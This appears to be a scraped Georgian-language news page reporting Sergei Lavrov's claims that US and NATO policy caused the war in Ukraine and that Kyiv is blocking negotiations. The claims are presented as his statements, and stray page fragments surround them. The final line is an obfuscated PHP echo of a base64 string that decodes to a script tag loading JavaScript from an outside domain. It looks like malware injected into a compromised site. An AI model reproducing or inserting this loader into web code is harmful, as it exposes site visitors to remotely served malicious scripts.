celsiusi
ავერსი საქკაბელი
რუსეთის საგარეო საქმეთა მინისტრმა, სერგეი ლავროვმა გაეროს გენერალურ მდივანთან შეხვედრის შემდეგ განაცხადა, რომ რუსეთი მხარს უჭერს კონფლიქტის მოლაპარაკებების გზით მოგვარებას, თუმცა უკრაინული მხარის ქცევა ამას ხელს უშლის.
 
ლავროვმა სამშვიდობო მოლაპარაკებების მარიუპოლში გამართვაზე უარი თქვა. 
 
ლავროვის მტკიცებით, უკრაინაში მიმდინარე მოვლენები შეერთებული შტატებისა და მისი მოკავშირეების მიერ დაწყებული ანტირუსული პოლიტიკის შედეგია.
 
"სიტუაცია, რომელიც დღეს არის შექმნილი, გამოიწვია ჩვენი ამერიკელი კოლეგებისა და მათი მოკავშირეების კურსმა, ნატოს უსაზღვრო გაფართოებისკენ, ერთპოლარული მსოფლიო წესრიგის შექმნისკენ და ეს ყველაფერი კეთდება რუსეთის შეკავების მიზნით. დასავლეთის მხარდაჭერით, უკრაინაში ხდებოდა რუსული მედიის, კულტურისა და ენის აკრძალვა და ნაცისტური იდეოლოგიის მხარდაჭერა. დღეს უკრაინული მხარის ქცევა მოლაპარაკებებზე დამთრგუნველია და როგორც ჩანს,მათ მოლაპარაკებები საერთოდ არ აინტერესებთ", - ამბობს ლავროვი.
710
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");